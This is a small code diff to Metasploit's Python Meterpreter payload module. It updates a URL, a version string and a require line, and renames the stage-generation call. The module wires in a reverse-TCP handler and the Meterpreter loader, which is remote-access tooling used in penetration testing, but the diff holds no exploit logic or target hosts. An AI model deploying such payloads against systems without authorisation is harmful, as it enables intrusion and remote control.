@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/python'
 require 'msf/core/payload/python/meterpreter_loader'
@@ -17,7 +16,7 @@ module MetasploitModule
   def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Python Meterpreter',
-      'Description'   => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5)',
+      'Description'   => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6)',
       'Author'        => 'Spencer McIntyre',
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
@@ -27,7 +26,6 @@ module MetasploitModule
   end
 
   def generate_stage(opts={})
-    stage_meterpreter(opts)
+    stage_payload(opts)
   end
-
 end
